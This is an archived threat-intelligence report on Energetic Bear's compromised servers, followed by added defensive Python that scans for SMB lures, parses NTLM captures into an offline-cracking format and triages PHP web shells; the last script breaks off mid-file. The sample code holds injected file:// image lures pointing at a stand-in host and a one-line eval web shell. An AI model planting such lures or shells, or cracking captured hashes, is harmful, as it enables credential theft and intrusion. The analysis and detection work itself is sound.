{
	"id": "b8db3552-309d-410a-ac6f-3a7e4b27cec1",
	"created_at": "2026-04-06T00:12:06.702623Z",
	"updated_at": "2026-04-10T03:32:49.927087Z",
	"deleted_at": null,
	"sha1_hash": "1d065e765e8733b8edc7709ebb8339a890abb149",
	"title": "Energetic Bear/Crouching Yeti: attacks on servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 481124,
	"plain_text": "Energetic Bear/Crouching Yeti: attacks on servers\r\nBy Kaspersky ICS CERT\r\nPublished: 2018-04-23 · Archived: 2026-04-05 17:44:20 UTC\r\nEnergetic Bear/Crouching Yeti is a widely known APT group active since at least 2010. The group tends to attack different companies with a strong focus on the energy and industrial sectors. Companies attacked by Energetic Bear/Crouching Yeti are geographically distributed worldwide, with a more obvious concentration in Europe and the US. In 2016-2017, the number of attacks on companies in Turkey increased significantly.\r\nThe main tactics of the group include sending phishing emails with malicious documents and infecting various servers. The group uses some of the infected servers for auxiliary purposes, to host tools and logs. Others are deliberately infected for use in waterhole attacks in order to reach the group’s main targets.\r\nRecent activity of the group against US organizations was discussed in a US-CERT advisory, which linked the actor to the Russian government, as well as in an advisory by the UK National Cyber Security Centre.\r\nThis report by Kaspersky Lab ICS CERT presents information on identified servers that have been infected and used by the group. The report also includes the findings of an analysis of several web servers compromised by the Energetic Bear group during 2016 and in early 2017.\r\nAttack victims\r\nThe table below shows the distribution of compromised servers (based on the language of website content and/or the origins of the company renting the server at the time of compromise) by country, attacked company type and the role of each server in the overall attack scheme. Victims of the threat actor’s attacks were not limited to industrial companies.\r\nTable 1. Compromised servers\r\nCountry | Description | Role in the attack\r\nRussia | Opposition political website | Waterhole\r\nRussia | Real estate agency | Auxiliary (collecting user data in the waterhole attack)\r\nRussia | Football club | Waterhole\r\nRussia | Developer and integrator of secure automation systems and IS consultant | Waterhole\r\nRussia | Developers of software and equipment | Auxiliary (collecting user data in the waterhole attack, tool hosting)\r\nRussia | Investment website | Auxiliary (collecting user data in the waterhole attack)\r\nUkraine | Electric power sector company | Waterhole\r\nUkraine | Bank | Waterhole\r\nUK | Aerospace company | Waterhole\r\nGermany | Software developer and integrator | Waterhole\r\nGermany | Unknown | Auxiliary (collecting user data in the waterhole attack)\r\nTurkey | Oil and gas sector enterprise | Waterhole\r\nTurkey | Industrial group | Waterhole\r\nTurkey | Investment group | Waterhole\r\nGreece | Server of a university | Auxiliary (collecting user data in the waterhole attack)\r\nUSA | Oil and gas sector enterprise | Waterhole\r\nUnknown | Affiliate network site | Auxiliary (collecting user data in the waterhole attack)\r\nUnknown | (not stated) | Waterhole\r\nAll waterhole servers are infected following the same pattern: a link with the scheme file://IP/filename.png is injected into a web page or JS file.\r\nThe link is used to initiate a request for an image; as a result, the user’s computer connects to the remote server over the SMB protocol and attempts to authenticate to it. In this attack type, the attackers’ goal is to extract the following data from the session:\r\nuser IP,\r\nuser name,\r\ndomain name,\r\nNTLM hash of the user’s password (strictly, the NTLM challenge-response produced during SMB authentication, which can be cracked offline or relayed).\r\nIt should be noted that the image requested using the link is not physically located on the remote server.\r\nScanned resources\r\nCompromised servers are in some cases used to conduct attacks on other resources. In the process of analyzing infected servers, numerous websites and servers were identified that the attackers had scanned with various tools, such as nmap, dirsearch, sqlmap, etc. (tool descriptions are provided below).\r\nTable 2. Resources that were scanned from one of the infected servers\r\nCountry (based on the content) | Description\r\nRussia | Non-profit organization\r\nRussia | Sale of drugs\r\nRussia | Travel/maps\r\nRussia | Resources based on the Bump platform (platform for corporate social networks): non-profit organization, social network for college/university alumni, communication platform for NGOs, etc.\r\nRussia | Business: photographic studio\r\nRussia | Industrial enterprise, construction company\r\nRussia | Door manufacturing\r\nRussia | Cryptocurrency exchange\r\nRussia | Construction information and analysis portal\r\nRussia | Personal website of a developer\r\nRussia | Vainah Telecom IPs and subnets (Chechen Republic)\r\nRussia | Various Chechen resources (governmental organizations, universities, industrial enterprises, etc.)\r\nRussia | Web server with numerous sites (alumni sites, sites of industrial and engineering companies, etc.)\r\nRussia | Muslim dating site\r\nBrazil | Water treatment\r\nTurkey | Hotels\r\nTurkey | Embassy in Turkey\r\nTurkey | Software developer\r\nTurkey | Airport website\r\nTurkey | City council website\r\nTurkey | Cosmetics manufacturer\r\nTurkey | Religious website\r\nTurkey | Turktelekom subnet with a large number of sites\r\nTurkey | Telnet Telecom subnet with a large number of sites\r\nGeorgia | Personal website of a journalist\r\nKazakhstan | Unknown web server\r\nUkraine | Office supplies online store\r\nUkraine | Floral business\r\nUkraine | Image hosting service\r\nUkraine | Online course on sales\r\nUkraine | Dealer of farming equipment and spare parts\r\nUkraine | Ukrainian civil servant’s personal website\r\nUkraine | Online store of parts for household appliance repair\r\nUkraine | Timber sales, construction\r\nUkraine | Tennis club website\r\nUkraine | Online store for farmers\r\nUkraine | Online store of massage equipment\r\nUkraine | Online clothes store\r\nUkraine | Website development and promotion\r\nUkraine | Online air conditioner store\r\nSwitzerland | Analytical company\r\nUS | Web server with many domains\r\nFrance | Web server with many domains\r\nVietnam | Unknown server\r\nInternational | Flight tracker\r\nThe sites and servers on this list do not seem to have anything in common. Even though the scanned servers do not necessarily look like potential final victims, it is likely that the attackers scanned different resources to find a server that could be used to establish a foothold for hosting the attackers’ tools and, subsequently, to develop the attack.\r\nPart of the sites scanned may have been of interest to the attackers as candidates for hosting waterhole resources.\r\nIn some cases, the domains scanned were hosted on the same server; sometimes the attackers went through the list of possible domains matching a given IP.\r\nIn most cases, multiple attempts to compromise a specific target were not identified, with the possible exception of sites on the Bump platform, flight tracker servers and servers of a Turkish hotel chain.\r\nCuriously, the sites scanned included a web developer’s website, kashey.ru, and resources linked from that site. These may have been resources developed by the site’s owner: www.esodedi.ru, www.i-stroy.ru, www.saledoor.ru.\r\nUtilities\r\nUtilities found on compromised servers are open-source and publicly available on GitHub:\r\nNmap – an open-source utility for network discovery and security auditing.\r\nDirsearch – a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.\r\nSqlmap – an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.\r\nSublist3r – a tool written in Python designed to enumerate website subdomains using open-source intelligence (OSINT). Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as services such as Netcraft, VirusTotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers collect information on the subdomains of the domain they are researching.\r\nWpscan – a black-box WordPress vulnerability scanner, i.e., one that works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.\r\nImpacket – a toolset for working with various network protocols, which is required by SMBTrap.\r\nSMBTrap – a tool for logging data received over the SMB protocol (user IP address, user name, domain name, NTLM challenge-response of the password).\r\nCommix – a Python tool for finding and exploiting command injection vulnerabilities.\r\nSubbrute – a Python subdomain enumeration tool that uses open name resolvers as a proxy and does not send traffic to the target’s DNS server.\r\nPHPMailer – a PHP library for sending email.\r\nIn addition, a custom Python script named ftpChecker.py was found on one of the servers. The script was designed to check FTP hosts from an incoming list.\r\nMalicious php files\r\nThe following malicious PHP files were found in different directories in the nginx folder and in a working directory created by the attackers on an infected web server:\r\nFile name | Brief description | md5sum | Time of the latest file change (MSK) | Size, bytes\r\nini.php | wso shell + mail | f3e3e25a822012023c6e81b206711865 | 2016-07-01 15:57:38 | 28786\r\nmysql.php | wso shell + mail | f3e3e25a822012023c6e81b206711865 | 2016-06-12 13:35:30 | 28786\r\nopts.php | wso shell | c76470e85b7f3da46539b40e5c552712 | 2016-06-12 12:23:28 | 36623\r\nerror_log.php | wso shell | 155385cc19e3092765bcfed034b82ccb | 2016-06-12 10:59:39 | 36636\r\ncode29.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 11:10:40 | 10724\r\nproxy87.php | web shell | 1644af9b6424e8f58f39c7fa5e76de51 | 2016-06-12 14:31:13 | 10724\r\ntheme.php | wso shell | 2292f5db385068e161ae277531b2e114 | 2017-05-16 17:33:02 | 133104\r\nsma.php | PHPMailer | 7ec514bbdc6dd8f606f803d39af8883f | 2017-05-19 13:53:53 | 14696\r\nmedia.php | wso shell | 78c31eff38fdb72ea3b1800ea917940f | 2017-04-17 15:58:41 | 1762986\r\nIn the table above:\r\nWeb shell is a script that allows remote administration of the machine.\r\nWSO is a popular web shell and file manager (it stands for “Web Shell by Orb”) that has the ability to masquerade as an error page containing a hidden login form. It is available on GitHub: https://github.com/phpFileManager/WSO\r\nTwo of the PHP scripts found, ini.php and mysql.php, contained a WSO shell concatenated with the following email spamming script: https://github.com/bediger4000/php-malware-analysis/tree/master/db-config.php\r\nAll the scripts found are obfuscated.\r\nOne of the web shells was found on the server under two different names (proxy87.php and code29.php). It uses the eval function to execute a command sent via HTTP cookies or a POST request.\r\nModified sshd\r\nA modified sshd with a preinstalled backdoor was found in the process of analyzing the server.\r\nPatches with some versions of backdoors for sshd that are similar to the backdoor found are available on GitHub, for example: https://github.com/jivoi/openssh-backdoor-kit\r\nCompilation is possible on any OS with binary compatibility.\r\nAs a result of replacing the original sshd file with a modified one on the infected server, an attacker can use a ‘master password’ to get authorized on the remote server, while leaving minimal traces (compared to an ordinary user connecting via ssh).\r\nIn addition, the modified sshd logs all legitimate ssh connections (this does not apply to the connection that uses the ‘master password’), including connection times, account names and passwords. The log is encrypted and is located at /var/tmp/.pipe.sock.\r\nActivity of the attackers on compromised servers\r\nIn addition to using compromised servers to scan numerous resources, other attacker activity was also identified.\r\nAfter gaining access to the server, the attackers installed the tools they needed at different times. Specifically, the following commands for third-party installations were identified on one of the servers:\r\napt install traceroute\r\napt-get install nmap\r\napt-get install screen\r\ngit clone https://github.com/sqlmapproject/sqlmap.git\r\nAdditionally, the attackers installed any packages and tools for Python they needed.\r\nA diagram in the original report (not reproduced in this text) shows the times of illegitimate logons to one of the compromised servers during one month. The attackers checked the smbtrap log file on working days. In most cases, they logged on to the server at roughly the same time of day, probably in the morning hours.\r\nIn addition, in the process of performing the analysis, an active process was identified that exploited SQL injection and collected data from a database of one of the victims.\r\nConclusion\r\nThe findings of the analysis of compromised servers and the attackers’ activity on these servers are as follows:\r\n1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.\r\n2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.\r\n3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.\r\n4. The diversity of victims may indicate the diversity of the attackers’ interests.\r\n5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.\r\nAppendix I – Indicators of Compromise\r\nFilenames and Paths\r\nTools*\r\n/usr/lib/libng/ftpChecker.py\r\n/usr/bin/nmap/\r\n/usr/lib/libng/dirsearch/\r\n/usr/share/python2.7/dirsearch/\r\n/usr/lib/libng/SMBTrap/\r\n/usr/lib/libng/commix/\r\n/usr/lib/libng/subbrute-master/\r\n/usr/share/python2.7/sqlmap/\r\n/usr/lib/libng/sqlmap-dev/\r\n/usr/lib/libng/wpscan/\r\n/usr/share/python2.7/wpscan/\r\n/usr/share/python2.7/Sublist3r/\r\n*Note that these tools can also be used by other threat actors.\r\nPHP files:\r\n/usr/share/python2.7/sma.php\r\n/usr/share/python2.7/theme.php\r\n/root/theme.php\r\n/usr/lib/libng/media.php\r\nLogs\r\n/var/tmp/.pipe.sock\r\nPHP file hashes\r\nf3e3e25a822012023c6e81b206711865\r\nc76470e85b7f3da46539b40e5c552712\r\n155385cc19e3092765bcfed034b82ccb\r\n1644af9b6424e8f58f39c7fa5e76de51\r\n2292f5db385068e161ae277531b2e114\r\n7ec514bbdc6dd8f606f803d39af8883f\r\n78c31eff38fdb72ea3b1800ea917940f\r\nYara rules\r\nrule Backdoored_ssh {\r\n    strings:\r\n        $a1 = \"OpenSSH\"\r\n        $a2 = \"usage: ssh\"\r\n        $a3 = \"HISTFILE\"\r\n    condition:\r\n        uint32(0) == 0x464c457f and filesize \u003c 1000000 and all of ($a*)\r\n}\r\nShell script for Debian\r\ncd /tmp\r\nworkdir=428c5fcf495396df04a459e317b70ca2\r\nmkdir $workdir\r\ncd $workdir\r\nfind / -type d -iname smbtrap \u003e find-smbtrap.txt 2\u003e/dev/null\r\nfind / -type d -iname dirsearch \u003e find-dirsearch.txt 2\u003e/dev/null\r\nfind / -type d -iname nmap \u003e find-nmap.txt 2\u003e/dev/null\r\nfind / -type d -iname wpscan \u003e find-wpscan.txt 2\u003e/dev/null\r\nfind / -type d -iname sublist3r \u003e find-sublist3r.txt 2\u003e/dev/null\r\ndpkg -l | grep -E '(impacket|pcapy|nmap)' \u003e dpkg-grep.txt\r\ncp /var/lib/dpkg/info/openssh-server.md5sums . # retrieve the packaged hash of sshd\r\nmd5sum /usr/sbin/sshd \u003e sshd.md5sum # calculate the actual hash of sshd\r\nShell script for CentOS\r\ncd /tmp\r\nworkdir=428c5fcf495396df04a459e317b70ca2\r\nmkdir $workdir\r\ncd $workdir\r\nfind / -type d -iname smbtrap \u003e find-smbtrap.txt 2\u003e/dev/null\r\nfind / -type d -iname dirsearch \u003e find-dirsearch.txt 2\u003e/dev/null\r\nfind / -type d -iname nmap \u003e find-nmap.txt 2\u003e/dev/null\r\nfind / -type d -iname wpscan \u003e find-wpscan.txt 2\u003e/dev/null\r\nfind / -type d -iname sublist3r \u003e find-sublist3r.txt 2\u003e/dev/null\r\nrpm -qa | grep -E '(impacket|pcapy|nmap)' \u003e rpm-grep.txt\r\nrpm -qa --dump | grep ssh \u003e rpm-qa-dump.txt # retrieve the packaged hash of sshd\r\nsha256sum /usr/sbin/sshd \u003e sshd.sha256sum # calculate the actual sha256 hash of sshd\r\nmd5sum /usr/sbin/sshd \u003e sshd.md5sum # calculate the actual md5 hash of sshd\r\nSource: https://securelist.com/energetic-bear-crouching-yeti/85345/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://securelist.com/energetic-bear-crouching-yeti/85345/"
	],
	"report_names": [
		"85345"
	],
	"threat_actors": [
		{
			"id": "649b5b3e-b16e-44db-91bc-ae80b825050e",
			"created_at": "2022-10-25T15:50:23.290412Z",
			"updated_at": "2026-04-10T02:00:05.257022Z",
			"deleted_at": null,
			"main_name": "Dragonfly",
			"aliases": [
				"TEMP.Isotope",
				"DYMALLOY",
				"Berserk Bear",
				"TG-4192",
				"Crouching Yeti",
				"IRON LIBERTY",
				"Energetic Bear",
				"Ghost Blizzard"
			],
			"source_name": "MITRE:Dragonfly",
			"tools": [
				"MCMD",
				"Impacket",
				"CrackMapExec",
				"Backdoor.Oldrea",
				"Mimikatz",
				"PsExec",
				"Trojan.Karagany",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28",
			"created_at": "2023-01-06T13:46:38.39927Z",
			"updated_at": "2026-04-10T02:00:02.958273Z",
			"deleted_at": null,
			"main_name": "ENERGETIC BEAR",
			"aliases": [
				"BERSERK BEAR",
				"ALLANITE",
				"Group 24",
				"Koala Team",
				"G0035",
				"ATK6",
				"ITG15",
				"DYMALLOY",
				"TG-4192",
				"Crouching Yeti",
				"Havex",
				"IRON LIBERTY",
				"Blue Kraken",
				"Ghost Blizzard"
			],
			"source_name": "MISPGALAXY:ENERGETIC BEAR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434326,
	"ts_updated_at": 1775791969,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1d065e765e8733b8edc7709ebb8339a890abb149.pdf",
		"text": "https://archive.orkl.eu/1d065e765e8733b8edc7709ebb8339a890abb149.txt",
		"img": "https://archive.orkl.eu/1d065e765e8733b8edc7709ebb8339a890abb149.jpg"
	}
}
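The report's "Attack victims" section describes the waterhole injection: a `file://IP/filename.png` reference planted in a page or JS file so that the visitor's machine opens an SMB session to the attackers' host. The scanner below is an added example (not code from the report or from Kaspersky) that finds such references in web content. It also covers the UNC spelling (`\\host\share\file`), which a Windows client treats the same way; the report itself documents only the `file://` form. The sample page and the 203.0.113.10 address are constructed.

```python
"""Find SMB credential lures (file:// and UNC image references to remote hosts) in web content.

Added example; not code from the Kaspersky report. The regexes and the sample page
below are this example's own construction.
"""
import ipaddress
import re

# Alternative 1: file://HOST/path (or file:\\HOST\path).  Alternative 2: \\HOST\share\path.
# Hosts are captured so that local references (file:///C:/..., localhost) can be skipped.
LURE_RE = re.compile(
    r"""(?P<uri>
          file:(?://|\\\\)(?P<h1>[A-Za-z0-9.\-]+)(?:[/\\][^\s"'<>()]*)?
        | (?<![A-Za-z0-9:])\\\\(?P<h2>[A-Za-z0-9.\-]+)\\[^\s"'<>()]+
        )""",
    re.IGNORECASE | re.VERBOSE,
)

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def classify_host(host):
    """Return 'local', 'ip' or 'name' for the host part of a lure."""
    if host.lower() in LOCAL_HOSTS:
        return "local"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "name"          # a DNS name; still forces an SMB connection if it resolves
    return "local" if addr.is_loopback else "ip"


def find_smb_lures(content):
    """Return one finding per remote file:// or UNC reference, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        for m in LURE_RE.finditer(line):
            host = m.group("h1") or m.group("h2")
            kind = classify_host(host)
            if kind == "local":
                continue       # file:///C:/... and localhost references are not lures
            findings.append({"line": lineno, "host": host, "host_kind": kind, "uri": m.group("uri")})
    return findings


# Constructed sample page: one legitimate image, one injected <img>, one injected JS preload,
# and a harmless local file:/// reference that must not be reported.
SAMPLE_PAGE = """<html><body>
<img src="/static/logo.png">
<img src="file://203.0.113.10/logo.png" width="1" height="1">
<script>
  var i = new Image(); i.src = "file://203.0.113.10/counter.png";
  var cfg = "file:///C:/Users/Public/local.png";
</script>
</body></html>"""

if __name__ == "__main__":
    for f in find_smb_lures(SAMPLE_PAGE):
        print("line %(line)d: %(uri)s (host %(host)s, %(host_kind)s)" % f)
```

Run it over a webroot (`for path in glob('**/*.html', recursive=True)`) or over a proxy capture; any `file://` or UNC reference to a host that is not the site itself is worth an incident, since a browser has no legitimate reason to fetch an image over SMB from a third party.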
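The report lists what the waterhole session yields: user IP, user name, domain name and the "NTLM hash of the user's password". What actually arrives at a trap such as SMBTrap is the NTLMSSP AUTHENTICATE (Type 3) message, whose NT response is a challenge-response (Net-NTLMv2), not the NT hash itself. The parser below is an added example, not code from the report, SMBTrap or Impacket; it follows the MS-NLMP field layout and formats the capture in the `user::domain:challenge:proof:blob` form offline crackers consume. The sample message, names and server challenge are constructed.

```python
"""Parse an NTLMSSP AUTHENTICATE (Type 3) message the way an SMB credential trap logs it.

Added example; not code from the Kaspersky report, SMBTrap or Impacket. The field layout
follows MS-NLMP; the sample message and server challenge at the bottom are constructed.
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_AUTHENTICATE = 3
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001

# Type 3 header: signature(8), type(4), six Len/MaxLen/BufferOffset descriptors(8 each), flags(4)
_FIELD_OFFSETS = {"lm": 12, "nt": 20, "domain": 28, "user": 36, "workstation": 44, "session_key": 52}
_FLAGS_OFFSET = 60
_HEADER_LEN = 64


def _read_field(msg, at):
    """Resolve a Len/MaxLen/BufferOffset descriptor to the bytes it points at."""
    length, _max_len, buf_off = struct.unpack_from("<HHI", msg, at)
    if buf_off + length > len(msg):
        raise ValueError("field points outside the message")
    return msg[buf_off:buf_off + length]


def parse_type3(msg):
    """Return identity and challenge-response material from a Type 3 message."""
    if len(msg) < _HEADER_LEN or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", msg, 8)
    if msg_type != NTLMSSP_AUTHENTICATE:
        raise ValueError("expected AUTHENTICATE (3), got type %d" % msg_type)
    (flags,) = struct.unpack_from("<I", msg, _FLAGS_OFFSET)
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp1252"
    fields = {name: _read_field(msg, at) for name, at in _FIELD_OFFSETS.items()}
    nt = fields["nt"]
    # NTLMv2 = 16-byte NTProofStr followed by the client blob; NTLMv1 is a flat 24 bytes.
    is_v2 = len(nt) > 24
    return {
        "domain": fields["domain"].decode(enc),
        "user": fields["user"].decode(enc),
        "workstation": fields["workstation"].decode(enc),
        "version": "NTLMv2" if is_v2 else "NTLMv1",
        "lm_response": fields["lm"],
        "nt_proof": nt[:16] if is_v2 else nt,
        "blob": nt[16:] if is_v2 else b"",
    }


def netntlmv2_line(auth, server_challenge):
    """Format a capture as user::domain:server_challenge:ntproofstr:blob for offline cracking."""
    if auth["version"] != "NTLMv2":
        raise ValueError("only NTLMv2 responses are formatted here")
    return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"], server_challenge.hex(),
                                auth["nt_proof"].hex(), auth["blob"].hex())


def build_type3(domain, user, workstation, nt_response, lm_response=b"\x00" * 24,
                flags=NTLMSSP_NEGOTIATE_UNICODE):
    """Assemble a Type 3 message as a client would send it (used here to construct test input)."""
    payloads = [lm_response, nt_response, domain.encode("utf-16-le"),
                user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    descriptors, body, offset = b"", b"", _HEADER_LEN
    for p in payloads:
        descriptors += struct.pack("<HHI", len(p), len(p), offset)
        body += p
        offset += len(p)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NTLMSSP_AUTHENTICATE)
            + descriptors + struct.pack("<I", flags) + body)


# Constructed sample: workstation WS01 in domain CORP answering a constructed 8-byte challenge.
SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_NT_RESPONSE = (bytes.fromhex("11" * 16)            # NTProofStr (HMAC-MD5 over the blob)
                      + bytes.fromhex("0101000000000000")  # blob signature + reserved
                      + bytes.fromhex("22" * 8)            # timestamp
                      + bytes.fromhex("33" * 8)            # client challenge
                      + b"\x00" * 4)                       # reserved; target-info AV pairs omitted
SAMPLE_TYPE3 = build_type3("CORP", "alice", "WS01", SAMPLE_NT_RESPONSE)

if __name__ == "__main__":
    auth = parse_type3(SAMPLE_TYPE3)
    print(auth["domain"], auth["user"], auth["workstation"], auth["version"])
    print(netntlmv2_line(auth, SAMPLE_CHALLENGE))
```

The server challenge is not in the Type 3 message; the trap knows it because it chose it when it sent the Type 2 (CHALLENGE) message, which is why a fixed challenge is popular with such tools (it enables rainbow tables for NTLMv1). The practical consequence for defenders: the leaked material can be cracked offline or relayed, so forcing SMB signing and blocking outbound TCP/445 at the perimeter neutralises this class of waterhole.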
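The report's "Malicious php files" section gives md5 values for the WSO shells and for a smaller web shell that passes a command from an HTTP cookie or POST body to `eval`. The triage script below is an added example (not Kaspersky's or the report's code) that walks a web root, matches files against that hash list and flags the eval-on-request-data and decode-then-eval patterns. The heuristics and the sample PHP files written by the demo are this example's own construction, not real samples.

```python
"""Triage PHP files under a web root for the web-shell indicators described in the report.

Added example; not code from the report. Two checks are combined: an exact md5 match
against the hash list from Appendix I, and a heuristic for the eval-on-request pattern
the report describes. The sample files written by run_demo() are constructed.
"""
import hashlib
import os
import re
import shutil
import tempfile

# md5 values of the malicious PHP files listed in the report's Appendix I.
KNOWN_BAD_MD5 = {
    "f3e3e25a822012023c6e81b206711865": "wso shell + mail (ini.php / mysql.php)",
    "c76470e85b7f3da46539b40e5c552712": "wso shell (opts.php)",
    "155385cc19e3092765bcfed034b82ccb": "wso shell (error_log.php)",
    "1644af9b6424e8f58f39c7fa5e76de51": "web shell (code29.php / proxy87.php)",
    "2292f5db385068e161ae277531b2e114": "wso shell (theme.php)",
    "7ec514bbdc6dd8f606f803d39af8883f": "PHPMailer (sma.php)",
    "78c31eff38fdb72ea3b1800ea917940f": "wso shell (media.php)",
}

# Execution sinks, request-data sources and decoding helpers (heuristic, this example's choice).
EXEC_SINK_RE = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(",
                          re.IGNORECASE)
REQUEST_SOURCE_RE = re.compile(r"\$_(COOKIE|POST|GET|REQUEST|FILES)\b")
DECODER_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.IGNORECASE)


def md5_of(path):
    with open(path, "rb") as f:
        return hashlib.md5(f.read()).hexdigest()


def heuristic_flags(source):
    """Return the reasons a PHP source looks like a web shell (empty list if none)."""
    reasons = []
    sinks = {m.group(1).lower() for m in EXEC_SINK_RE.finditer(source)}
    if sinks and REQUEST_SOURCE_RE.search(source):
        reasons.append("request data reaches " + ", ".join(sorted(sinks)))
    if sinks and DECODER_RE.search(source):
        reasons.append("decoding helper feeds an execution sink (obfuscation)")
    return reasons


def triage_webroot(root):
    """Walk root; return findings for PHP files matching a known hash or the heuristics."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            digest = md5_of(path)
            with open(path, "r", errors="replace") as f:
                reasons = heuristic_flags(f.read())
            if digest in KNOWN_BAD_MD5:
                reasons.insert(0, "known hash: " + KNOWN_BAD_MD5[digest])
            if reasons:
                findings.append({"path": path, "md5": digest, "reasons": reasons})
    return findings


def write_sample_webroot(root):
    """Write constructed sample files (not real malware) so the triage can run offline."""
    samples = {
        "code29.php": "<?php if (isset($_COOKIE['c'])) { @eval($_COOKIE['c']); } else { @eval($_POST['c']); } ?>",
        "theme.php": "<?php eval(gzinflate(base64_decode('H4sIAAAAAAAA'))); ?>",
        "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
        "style.css": "body { color: #000; }",
    }
    os.makedirs(root, exist_ok=True)
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as f:
            f.write(body)


def run_demo():
    """Create a throwaway web root with the constructed samples and return {file: reasons}."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        write_sample_webroot(root)
        return {os.path.basename(f["path"]): f["reasons"] for f in triage_webroot(root)}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, reasons in sorted(run_demo().items()):
        print(name, "->", "; ".join(reasons))
```

Point it at the nginx document root and at any writable directory the web server user owns; the report found the shells both in site directories and in a working directory the attackers created. Hash matching only catches the exact files listed, so the heuristic half is what finds the renamed copies (the same shell appeared as both proxy87.php and code29.php).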
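The report's "Modified sshd" section and its appendix give three indicators for the trojanised daemon: the binary no longer matches the package manifest (the Debian/CentOS shell snippets collect the packaged and actual hashes but leave the comparison to the analyst), the encrypted credential log `/var/tmp/.pipe.sock`, and the `Backdoored_ssh` Yara rule. The checker below is an added example (not the report's code) that performs all three against a root directory, so it can be run against a mounted disk image as well as a live host. The demo tree, the fake ELF bytes and the manifest it writes are constructed.

```python
"""Check an sshd binary against its package manifest and the report's backdoor indicators.

Added example; not code from the Kaspersky report. It adds the comparison step to what
the report's Debian/CentOS snippets collect, checks for the /var/tmp/.pipe.sock log and
reimplements the conditions of the Backdoored_ssh Yara rule. The demo tree is constructed.
"""
import hashlib
import os
import shutil
import tempfile

ELF_MAGIC = b"\x7fELF"                                     # uint32(0) == 0x464c457f
YARA_STRINGS = (b"OpenSSH", b"usage: ssh", b"HISTFILE")   # $a1..$a3 from the report's rule
YARA_MAX_SIZE = 1_000_000                                  # filesize < 1000000
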